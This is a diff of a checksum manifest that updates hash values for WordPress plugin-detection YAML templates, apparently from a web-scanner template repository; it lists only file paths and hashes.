-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
-http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
-http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
-http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:37900c349918911000d5a7eae87769e978e21988
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/easy-google-fonts.yaml:df81c34d041dc7b560434f676ad74b5d5d74d01a
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
+http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba
http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
-http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
+http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74
http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
